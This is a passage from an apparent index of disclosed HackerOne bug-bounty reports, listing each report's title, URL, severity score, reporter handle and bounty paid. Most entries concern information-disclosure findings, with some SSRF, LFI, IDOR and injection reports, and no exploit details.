\nhttps://hackerone.com/reports/959897\n#### Severity score\nnull\n#### Reporter \nrisinghunter\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nresolved bugs in a program are public despite the program settings\n#### URL \nhttps://hackerone.com/reports/270993\n#### Severity score\nnull\n#### Reporter \nflashdisk\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nSensitive Support Mail Disclosure\n#### URL \nhttps://hackerone.com/reports/234947\n#### Severity score\nnull\n#### Reporter \nh33t\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPossible sensitive files\n#### URL \nhttps://hackerone.com/reports/8019\n#### Severity score\nnull\n#### Reporter \n0xsaikiran\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nExposure of tinyMCE js source code with plugin version disclosure which can leads to exploit further attacks.\n#### URL \nhttps://hackerone.com/reports/463123\n#### Severity score\nnull\n#### Reporter \nwolfdroid\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nContent Spoofing \n#### URL \nhttps://hackerone.com/reports/90753\n#### Severity score\nnull\n#### Reporter \ngirish_s_pattanashetty\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nCRITICAL full source code/config disclosure for Cameo\n#### URL \nhttps://hackerone.com/reports/43998\n#### Severity score\nnull\n#### Reporter \navlidienbrunn\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nInformation disclosure (system username, server info) in the x-amz-meta-s3cmd-attrs response header on data.gov\n#### URL \nhttps://hackerone.com/reports/667032\n#### Severity score\nnull\n#### Reporter \nninja_cyber007\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPrivate program disclosure via `vpn_suspended` GraphQL query\n#### URL \nhttps://hackerone.com/reports/715192\n#### Severity score\nnull\n#### Reporter \nunknown_person\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\nRedmin API Key Exposed In GIthub \n#### URL \nhttps://hackerone.com/reports/901210\n#### Severity score\n6.1\n#### Reporter \nelmahdi\n### Bounty paid\n$400\n\n\n---\n\n\n### Title\nBanner Grabbing - Apache Server Version Disclousure\n#### URL \nhttps://hackerone.com/reports/460556\n#### Severity score\nnull\n#### Reporter \nhamzamandil\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nДубликат: https://hackerone.com/reports/219171 (доступ к аккаунту, через сброс пароля)\n#### URL \nhttps://hackerone.com/reports/222252\n#### Severity score\nnull\n#### Reporter \nnorver\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nPossible to steal any protected files on Android\n#### URL \nhttps://hackerone.com/reports/161710\n#### Severity score\nnull\n#### Reporter \nbagipro\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nJDBC credentials leaked via github\n#### URL \nhttps://hackerone.com/reports/935573\n#### Severity score\nnull\n#### Reporter \nwalidhossain\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTHX Tuneup Survey feedback disclosure via Google cached content for apps.thx.com\n#### URL \nhttps://hackerone.com/reports/751729\n#### Severity score\n3.7\n#### Reporter \njackb898\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nFlash local-with-fileaccess Sandbox Bypass\n#### URL \nhttps://hackerone.com/reports/2140\n#### Severity score\nnull\n#### Reporter \nkinine\n### Bounty paid\n$2,000\n\n\n---\n\n\n### Title\nDisclosure of information about the system, configuration files.\n#### URL \nhttps://hackerone.com/reports/364910\n#### Severity score\nnull\n#### Reporter \nfr_0_ank\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nh1-ctf writeup , finally paid the payments by chaining multiple bugs\n#### URL \nhttps://hackerone.com/reports/894110\n#### Severity score\nnull\n#### Reporter \nd1r3wolf\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nServer version is disclosure in http://leasewebnoc.com/\n#### URL \nhttps://hackerone.com/reports/119666\n#### Severity score\nnull\n#### Reporter \nsecdoor\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure of Garbage Collection Cycle\n#### URL \nhttps://hackerone.com/reports/981796\n#### Severity score\nnull\n#### Reporter \nahmd_halabi\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nADB Backup is enabled within AndroidManifest\n#### URL \nhttps://hackerone.com/reports/170398\n#### Severity score\nnull\n#### Reporter \nsfsecurityfirst\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nEstimation of a Lower Bound on Number of Uber Drivers via Enumeration\n#### URL \nhttps://hackerone.com/reports/125488\n#### Severity score\nnull\n#### Reporter \nddworken\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nKnow whether private program for company exist or not\n#### URL \nhttps://hackerone.com/reports/105887\n#### Severity score\nnull\n#### Reporter \nashish_r_padelkar\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nStealing Facebook OAuth Code Through Screenshot viewer\n#### URL \nhttps://hackerone.com/reports/488269\n#### Severity score\n5.8\n#### Reporter \nnetfuzzer\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nDisclosure of information on static.dl.mail.ru\n#### URL \nhttps://hackerone.com/reports/201948\n#### Severity score\nnull\n#### Reporter \nrbcafe\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLFI through the MySQL connection\n#### URL \nhttps://hackerone.com/reports/719875\n#### Severity score\nnull\n#### Reporter \nmuon4\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCalendar and addressbook names disclosed (NC-SA-2017-012)\n#### URL \nhttps://hackerone.com/reports/203594\n#### Severity score\n3.5\n#### Reporter \njuliushaertl\n### Bounty paid\n$183\n\n\n---\n\n\n### Title\nSearching from Hacktivity returns hits for words in limited disclosure reports that are not visible\n#### URL \nhttps://hackerone.com/reports/685909\n#### Severity score\n4.4\n#### Reporter \nnathand\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\nNginx version disclosure via forbidden page\n#### URL \nhttps://hackerone.com/reports/197880\n#### Severity score\nnull\n#### Reporter \noverlax\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSSRF+XSS\n#### URL \nhttps://hackerone.com/reports/326043\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPrivate program policy page still accessible after user left the program\n#### URL \nhttps://hackerone.com/reports/386997\n#### Severity score\n4.2\n#### Reporter \njapz\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\nInvited team member can disclosure slack channels\n#### URL \nhttps://hackerone.com/reports/509574\n#### Severity score\nnull\n#### Reporter \neremeev\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nPHP PDOException and Full Path Disclosure\n#### URL \nhttps://hackerone.com/reports/19363\n#### Severity score\nnull\n#### Reporter \nsupernatural\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path Disclosure (FPD) in www.localize.io\n#### URL \nhttps://hackerone.com/reports/8088\n#### Severity score\nnull\n#### Reporter \nfaisalahmed\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure vulnerability on a DoD website\n#### URL \nhttps://hackerone.com/reports/189458\n#### Severity score\nnull\n#### Reporter \nkhizer47\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure on https://theendlessweb.com/\n#### URL \nhttps://hackerone.com/reports/461598\n#### Severity score\nnull\n#### Reporter \ndhamu_harker\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[moba.my.com] phpinfo, logs\n#### URL \nhttps://hackerone.com/reports/410793\n#### Severity score\n0\n#### Reporter \nbobrov\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nKeys\n#### URL \nhttps://hackerone.com/reports/269831\n#### Severity score\nnull\n#### Reporter \nashishag29\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nimage injection /screenshot-viewer/responsive/image (ANOTHER FIX BYPASS)\n#### URL \nhttps://hackerone.com/reports/506126\n#### Severity score\nnull\n#### Reporter \nnetfuzzer\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nPHP version disclosed on blog.algolia.com\n#### URL \nhttps://hackerone.com/reports/116692\n#### Severity score\nnull\n#### Reporter \nbugs3ra\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAll Vimeo Private videos disclosure via Authorization Bypass\n#### URL \nhttps://hackerone.com/reports/137502\n#### Severity score\nnull\n#### Reporter \nopnsec\n### Bounty paid\n$600\n\n\n---\n\n\n### Title\nEmail Address Leak\n#### URL \nhttps://hackerone.com/reports/123170\n#### Severity score\nnull\n#### Reporter \nmikkz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFULL PATH DISCLOSUR \n#### URL \nhttps://hackerone.com/reports/7736\n#### Severity score\nnull\n#### Reporter \nbenamarouche\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUser Information Disclosure via Json response\n#### URL \nhttps://hackerone.com/reports/335779\n#### Severity score\nnull\n#### Reporter \nd3ad1y_b0073r\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nJSON serialization of any Project model results in all Runner tokens being exposed through Quick Actions\n#### URL \nhttps://hackerone.com/reports/509924\n#### Severity score\n9.1\n#### Reporter \njobert\n### Bounty paid\n$12,000\n\n\n---\n\n\n### Title\nUsing an outdated version of OpenSSH on db01.wakatime.com\n#### URL \nhttps://hackerone.com/reports/246780\n#### Severity score\nnull\n#### Reporter \nsilv3rpoision\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure on stun.screenhero.com\n#### URL \nhttps://hackerone.com/reports/175061\n#### Severity score\n6.5\n#### Reporter \nkazan71p\n### Bounty paid\n$700\n\n\n---\n\n\n### Title\n[vulners.com] nginx alias_traversal\n#### URL \nhttps://hackerone.com/reports/317201\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAccessible Druid Monitor console on https://api.pay-staging.razer.com/\n#### URL \nhttps://hackerone.com/reports/702784\n#### Severity score\nnull\n#### Reporter \n0xklaue\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nPrivate information exposed through GraphQL filters\n#### URL \nhttps://hackerone.com/reports/645299\n#### Severity score\n6.1\n#### Reporter \nreigertje\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPassword disclosure during signup process\n#### URL \nhttps://hackerone.com/reports/127766\n#### Severity score\nnull\n#### Reporter \nfoundstone-kunal\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nServer header - information disclosure \n#### URL \nhttps://hackerone.com/reports/7914\n#### Severity score\nnull\n#### Reporter \nvhssunny1\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPII Leak of USCG Designated Examiner List at https://www.███\n#### URL \nhttps://hackerone.com/reports/1007702\n#### Severity score\nnull\n#### Reporter \nnagli\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSSRF on █████████ Allowing internal server data access\n#### URL \nhttps://hackerone.com/reports/326040\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nProgram profile_metrics.json contains time to triage for deptofdefense even it's turned off\n#### URL \nhttps://hackerone.com/reports/318399\n#### Severity score\nnull\n#### Reporter \nkunal94\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nClientId gives away platform (iOS/Android) from which a secret was posted.\n#### URL \nhttps://hackerone.com/reports/19210\n#### Severity score\nnull\n#### Reporter \ndenull\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nHardcoded credentials in Android App\n#### URL \nhttps://hackerone.com/reports/412772\n#### Severity score\nnull\n#### Reporter \nmadrobot\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCSV Injection at Camptix Event Ticketing\n#### URL \nhttps://hackerone.com/reports/151516\n#### Severity score\nnull\n#### Reporter \nthezawad\n### Bounty paid\n$375\n\n\n---\n\n\n### Title\nInformation Disclosure in Error Page\n#### URL \nhttps://hackerone.com/reports/115219\n#### Severity score\nnull\n#### Reporter \nvichaarya\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUsername Information Disclosure via Json response - Using parameter number Intruder\n#### URL \nhttps://hackerone.com/reports/812351\n#### Severity score\nnull\n#### Reporter \n0xrobot\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure on sim.starbucks.com\n#### URL \nhttps://hackerone.com/reports/632808\n#### Severity score\nnull\n#### Reporter \njohnstone\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nHTTP Track/Trace Method Enabled\n#### URL \nhttps://hackerone.com/reports/119860\n#### Severity score\nnull\n#### Reporter \nzephrfish\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nImage Injection on /bully/anniversaryedition may lead to OAuth token theft.\n#### URL \nhttps://hackerone.com/reports/498358\n#### Severity score\n5.8\n#### Reporter \nnetfuzzer\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nDebug.log file Exposed to Public \\Full Path Disclosure\\\n#### URL \nhttps://hackerone.com/reports/202939\n#### Severity score\nnull\n#### Reporter \nkhizer47\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nhttp://████/data.json showing users sensitive information via json file\n#### URL \nhttps://hackerone.com/reports/184472\n#### Severity score\nnull\n#### Reporter \n00utsav00\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAble To Check The Exact Bounty Balance of any Bug Bounty Program\n#### URL \nhttps://hackerone.com/reports/293593\n#### Severity score\n5\n#### Reporter \ncjlegacion\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nРаскрытие баланса на //kopilka.qiwi.com\n#### URL \nhttps://hackerone.com/reports/178049\n#### Severity score\nnull\n#### Reporter \nnstikhomirov\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nAlready Registered Email Disclosure\n#### URL \nhttps://hackerone.com/reports/223343\n#### Severity score\nnull\n#### Reporter \nanonymans\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nS3 bucket data at http://rockset-support.s3-us-west-2.amazonaws.com/ reveals user addresses based on latitudes and longitudes.\n#### URL \nhttps://hackerone.com/reports/947725\n#### Severity score\n8.3\n#### Reporter \nboy_child_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nStealing Private Information in VK Android App through PlayerProxy Port Remotely\n#### URL \nhttps://hackerone.com/reports/292761\n#### Severity score\nnull\n#### Reporter \nheeeeen\n### Bounty paid\n$700\n\n\n---\n\n\n### Title\nPhone Number Enumeration\n#### URL \nhttps://hackerone.com/reports/138881\n#### Severity score\nnull\n#### Reporter \nmegocode3\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nExposing debug.log file leads to server full path disclosure\n#### URL \nhttps://hackerone.com/reports/696360\n#### Severity score\nnull\n#### Reporter \nsohelahmed786\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSource code and internal credentials disclosure\n#### URL \nhttps://hackerone.com/reports/898522\n#### Severity score\n8.9\n#### Reporter \npaul_axe\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nArbitrary Local-File Read from Admin - Restore From Backup due to Symlinks\n#### URL \nhttps://hackerone.com/reports/213558\n#### Severity score\nnull\n#### Reporter \nziot\n### Bounty paid\n$512\n\n\n---\n\n\n### Title\nNginx Version Disclosure On Forbidden Page\n#### URL \nhttps://hackerone.com/reports/148768\n#### Severity score\nnull\n#### Reporter \nmefkan\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDisclosure of User Information\n#### URL \nhttps://hackerone.com/reports/753725\n#### Severity score\nnull\n#### Reporter \nshardulb_23\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nerror\n#### URL \nhttps://hackerone.com/reports/309594\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNPM_API_KEY Leak\n#### URL \nhttps://hackerone.com/reports/944732\n#### Severity score\nnull\n#### Reporter \nrzx007x\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nInformation Disclosure of .htaccess file in Private Server/Subdomain\n#### URL \nhttps://hackerone.com/reports/163106\n#### Severity score\nnull\n#### Reporter \nahsan\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMultiple Information Disclosure with Go PPROF on api-ne.mackeeper.com\n#### URL \nhttps://hackerone.com/reports/783807\n#### Severity score\nnull\n#### Reporter \nm4-k\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nПолучение оригинала скрытого изображения\n#### URL \nhttps://hackerone.com/reports/143669\n#### Severity score\nnull\n#### Reporter \nnikitchenko\n### Bounty paid\n$280\n\n\n---\n\n\n### Title\nInformation disclosure vulnerability on a DoD website\n#### URL \nhttps://hackerone.com/reports/195638\n#### Severity score\nnull\n#### Reporter \nsp1d3rs\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull path disclosure vulnerability via Upload .htaccess file\n#### URL \nhttps://hackerone.com/reports/919429\n#### Severity score\nnull\n#### Reporter \narezthehopebuster_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nServer version disclosure\n#### URL \nhttps://hackerone.com/reports/149483\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAccess to Grafana Dashboard\n#### URL \nhttps://hackerone.com/reports/186586\n#### Severity score\nnull\n#### Reporter \nthehackerish\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure when trying to delete an expense's attachment on m.mavenlink.com \n#### URL \nhttps://hackerone.com/reports/299334\n#### Severity score\nnull\n#### Reporter \naroly\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\n[id.rapida.ru] Full Path Disclosure\n#### URL \nhttps://hackerone.com/reports/165219\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nView all deleted comments and rating of any app .\n#### URL \nhttps://hackerone.com/reports/135756\n#### Severity score\nnull\n#### Reporter \nvijay_kumar\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nhtaccess file is accesible\n#### URL \nhttps://hackerone.com/reports/182017\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nHackerOne support disclosing report state without checking user identity\n#### URL \nhttps://hackerone.com/reports/356566\n#### Severity score\n3.8\n#### Reporter \namans\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\n[avito.ru] Утекают креды от платежных провайдеров\n#### URL \nhttps://hackerone.com/reports/271360\n#### Severity score\nnull\n#### Reporter \nkxyry\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nphpinfo \n#### URL \nhttps://hackerone.com/reports/521779\n#### Severity score\n0\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nElmah.axd is publicly accessible and leaking Error Log for ROOT on █████_PRD_WEB1 █████████elmah.axd\n#### URL \nhttps://hackerone.com/reports/962753\n#### Severity score\nnull\n#### Reporter \nrudra_2000\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSubdomain Takeover \n#### URL \nhttps://hackerone.com/reports/113869\n#### Severity score\nnull\n#### Reporter \nkiraak-boy\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure, groups.yahoo.com,6-april-2014, #SpringClean\n#### URL \nhttps://hackerone.com/reports/5986\n#### Severity score\nnull\n#### Reporter \ndefmax\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUninitilized server memory disclosure via ImageMagick\n#### URL \nhttps://hackerone.com/reports/294548\n#### Severity score\nnull\n#### Reporter \nhudmi\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nОткрытая панель\n#### URL \nhttps://hackerone.com/reports/454770\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nExternal Service Interaction | https://█████████.mil\n#### URL \nhttps://hackerone.com/reports/997988\n#### Severity score\nnull\n#### Reporter \nx3ph_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull path disclosure at ads.twitter.com\n#### URL \nhttps://hackerone.com/reports/26825\n#### Severity score\nnull\n#### Reporter \ninternetwache\n### Bounty paid\n$140\n\n\n---\n\n\n### Title\nSSRF issue in \"URL target\" allows [REDACTED]\n#### URL \nhttps://hackerone.com/reports/58897\n#### Severity score\nnull\n#### Reporter \nagarri_fr\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nServer version disclosure on [jenkins.brew.sh]\n#### URL \nhttps://hackerone.com/reports/221989\n#### Severity score\nnull\n#### Reporter \nneutrinoguy\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure - Composer.lock\n#### URL \nhttps://hackerone.com/reports/294568\n#### Severity score\nnull\n#### Reporter \nbhenner__\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path Disclosure In EasyDB\n#### URL \nhttps://hackerone.com/reports/119494\n#### Severity score\nnull\n#### Reporter \nsupernatural\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nbypass to csv injection\n#### URL \nhttps://hackerone.com/reports/161290\n#### Severity score\nnull\n#### Reporter \nsuperngorksky\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nIDOR - Deleting other user's signature via /appsuite/api/snippet?action=update (although an error is thrown)\n#### URL \nhttps://hackerone.com/reports/199321\n#### Severity score\nnull\n#### Reporter \ninhibitor181\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\n[Cross Domain Referrer Leakage] Password Reset Token Leaking to Third party Sites.\n#### URL \nhttps://hackerone.com/reports/265740\n#### Severity score\nnull\n#### Reporter \nykw1337\n### Bounty paid\n$40\n\n\n---\n\n\n### Title\nMinor Bug: Public un-compiled CSS with original sass, versioning, source map, comments, etc.\n#### URL \nhttps://hackerone.com/reports/90367\n#### Severity score\nnull\n#### Reporter \nericr\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull path disclosure\n#### URL \nhttps://hackerone.com/reports/7894\n#### Severity score\nnull\n#### Reporter \nsiddiki\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nДорк\n#### URL \nhttps://hackerone.com/reports/117902\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\n3rd party shop admin panel blind XSS\n#### URL \nhttps://hackerone.com/reports/336145\n#### Severity score\nnull\n#### Reporter \nw2w\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure and Privilege Escalation in app.goodhire.com/member/developers/api-settings\n#### URL \nhttps://hackerone.com/reports/276976\n#### Severity score\n8.5\n#### Reporter \nhackedbrain\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nSource code disclosure\n#### URL \nhttps://hackerone.com/reports/521960\n#### Severity score\n5.3\n#### Reporter \nlinkks\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nУязвимость приватных записей пользователя (личных)\n#### URL \nhttps://hackerone.com/reports/65966\n#### Severity score\nnull\n#### Reporter \npisarenko\n### Bounty paid\n$400\n\n\n---\n\n\n### Title\nImage Injection vulnerability affecting www.rockstargames.com/careers may lead to Facebook OAuth Theft\n#### URL \nhttps://hackerone.com/reports/491654\n#### Severity score\nnull\n#### Reporter \nnetfuzzer\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nFull path disclosure when CSRF validation failed \n#### URL \nhttps://hackerone.com/reports/148890\n#### Severity score\nnull\n#### Reporter \nabdullah\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNews Feed Detected \n#### URL \nhttps://hackerone.com/reports/163730\n#### Severity score\nnull\n#### Reporter \nmansouri_badis\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nImage Upload Path Disclosure\n#### URL \nhttps://hackerone.com/reports/158021\n#### Severity score\nnull\n#### Reporter \nmefkan\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nPrivate Program Disclosure in /:handle/settings/allow_report_submission.json endpoint\n#### URL \nhttps://hackerone.com/reports/116798\n#### Severity score\nnull\n#### Reporter \ncharfee\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nExposed debug.log file leads to information disclosure\n#### URL \nhttps://hackerone.com/reports/775504\n#### Severity score\nnull\n#### Reporter \nmd15ev\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nEmail ID Disclosure.\n#### URL \nhttps://hackerone.com/reports/146106\n#### Severity score\nnull\n#### Reporter \nbugdiscloseguys\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPHP info page disclosure on http://www.day.dk/\n#### URL \nhttps://hackerone.com/reports/165930\n#### Severity score\nnull\n#### Reporter \n0x01alka\n### Bounty paid\n$60\n\n\n---\n\n\n### Title\nreopen #128853 (Information disclosure at lite.uber.com)\n#### URL \nhttps://hackerone.com/reports/129712\n#### Severity score\nnull\n#### Reporter \nkusl\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nData race conditions reported by helgrind when performing parallel DNS queries in libcurl\n#### URL \nhttps://hackerone.com/reports/1019457\n#### Severity score\n5.2\n#### Reporter \nbrumbrum\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nReports Modal in app.mopub.com Disclose by any user\n#### URL \nhttps://hackerone.com/reports/574639\n#### Severity score\n4.9\n#### Reporter \nupdatelap\n### Bounty paid\n$280\n\n\n---\n\n\n### Title\nHackerOne customer submitted sensitive link to VirusTotal, exposing confidential information\n#### URL \nhttps://hackerone.com/reports/378122\n#### Severity score\nnull\n#### Reporter \ntester2020\n### Bounty paid\n$350\n\n\n---\n\n\n### Title\nUninitialized read in gdImageCreateFromXbm\n#### URL \nhttps://hackerone.com/reports/623588\n#### Severity score\n5.3\n#### Reporter \nchamal\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\napps.owncloud.com: Mixed Active Scripting Issue \n#### URL \nhttps://hackerone.com/reports/85541\n#### Severity score\nnull\n#### Reporter \nsuhas_gaikwad\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nImage injection on /screenshot-viewer/responsive/image ( FIX BYPASS)\n#### URL \nhttps://hackerone.com/reports/505259\n#### Severity score\nnull\n#### Reporter \nnetfuzzer\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nFilename and directory enumeration\n#### URL \nhttps://hackerone.com/reports/149273\n#### Severity score\nnull\n#### Reporter \nstrukt\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCan read features from any user\n#### URL \nhttps://hackerone.com/reports/316810\n#### Severity score\nnull\n#### Reporter \nfirs0v\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nSession Fixation disclosing email address\n#### URL \nhttps://hackerone.com/reports/2582\n#### Severity score\nnull\n#### Reporter \nxtross1\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure on demo.weblate.org\n#### URL \nhttps://hackerone.com/reports/229620\n#### Severity score\nnull\n#### Reporter \nsp1d3rs\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nbenchmark metrics available at 5.61.239.154\n#### URL \nhttps://hackerone.com/reports/449613\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLack of CSRF header validation at https://g-mail.grammarly.com/profile\n#### URL \nhttps://hackerone.com/reports/629892\n#### Severity score\n4.2\n#### Reporter \norlserg\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nError stack trace\n#### URL \nhttps://hackerone.com/reports/41469\n#### Severity score\nnull\n#### Reporter \n4lemon\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nUrgent: attacker can access every data source on Bime\n#### URL \nhttps://hackerone.com/reports/149907\n#### Severity score\nnull\n#### Reporter \njobert\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nThis Github Repository Seems Leaking Samokat Django Project\n#### URL \nhttps://hackerone.com/reports/1016860\n#### Severity score\nnull\n#### Reporter \ngevakun\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nPublic access to objects in AWS S3 bucket\n#### URL \nhttps://hackerone.com/reports/202725\n#### Severity score\nnull\n#### Reporter \nehsahil\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nPath disclosure in platform0.twitter.com\n#### URL \nhttps://hackerone.com/reports/44371\n#### Severity score\nnull\n#### Reporter \navicoder_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nhttp://digital.starbucks.com/ Creation of Google G Suite Account on Behalf of starbucks. \n#### URL \nhttps://hackerone.com/reports/191179\n#### Severity score\nnull\n#### Reporter \nkhizer47\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDefault Creds Spring Boot Admin\n#### URL \nhttps://hackerone.com/reports/954818\n#### Severity score\n7.5\n#### Reporter \ntestingforbugs\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLeak of Platform Authentication credentials via Repeater\n#### URL \nhttps://hackerone.com/reports/302651\n#### Severity score\nnull\n#### Reporter \njupenur\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nFull Path Disclosure (2)\n#### URL \nhttps://hackerone.com/reports/8013\n#### Severity score\nnull\n#### Reporter \nsiddiki\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBypass Tracking Blocker Protection Using Slashes Without Protocol On The Image Source.\n#### URL \nhttps://hackerone.com/reports/1050656\n#### Severity score\nnull\n#### Reporter \ndemonia\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nОткрытая информация phpinfo() на сайте https://agent.mail.ru\n#### URL \nhttps://hackerone.com/reports/351363\n#### Severity score\nnull\n#### Reporter \nmobius07\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nStealing the ip addres from users\n#### URL \nhttps://hackerone.com/reports/672499\n#### Severity score\nnull\n#### Reporter \nminoto\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nF5 BigIP Backend Cookie Disclosure\n#### URL \nhttps://hackerone.com/reports/384905\n#### Severity score\nnull\n#### Reporter \nlovepakistan\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\n[Airship CMS] Local File Inclusion - RST Parser\n#### URL 